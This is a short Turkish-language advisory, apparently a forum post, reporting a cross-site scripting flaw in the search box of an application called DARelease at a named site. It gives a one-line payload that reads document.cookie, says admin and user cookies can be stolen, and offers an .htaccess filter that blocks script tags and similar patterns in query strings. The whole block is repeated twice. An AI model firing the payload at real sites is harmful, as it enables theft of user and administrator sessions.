endLesS
Webmaster
< ------------------- header data start ------------------- >
#############################################################
# Application Name : DARelease
# Vulnerable Type : Cross Site Scripting
# Infection : Yönetici ve User cookieleri çalınabilir.
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
# Author : qrusher- | Bug Researchers
# Example : http://www.darelease.com/search.php
Post Search Box
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(document.cookie)</script> // Post Search Box
< -- bug code start -- >
.htaccess Dosyasının içine aşşağıdaki kodu yazın ve böylece sitenize yapılan herhangi bir XSS
saldırısında siteniz hata verecektir.
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\\\(.*\\\\) [OR]
RewriteCond %{QUERY_STRING} (\\\\<|<).*script.*(\\\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\\\[|\\\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\\\[|\\\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
< -- bug code end of -- >
#############################################################
# Application Name : DARelease
# Vulnerable Type : Cross Site Scripting
# Infection : Yönetici ve User cookieleri çalınabilir.
# Bug Fix Advice : Zararlı karakterler filtrelenmelidir.
# Author : qrusher- | Bug Researchers
# Example : http://www.darelease.com/search.php
Post Search Box
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
>**********alert(document.cookie)</script> // Post Search Box
< -- bug code start -- >
.htaccess Dosyasının içine aşşağıdaki kodu yazın ve böylece sitenize yapılan herhangi bir XSS
saldırısında siteniz hata verecektir.
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\\\(.*\\\\) [OR]
RewriteCond %{QUERY_STRING} (\\\\<|<).*script.*(\\\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\\\[|\\\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\\\[|\\\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
< -- bug code end of -- >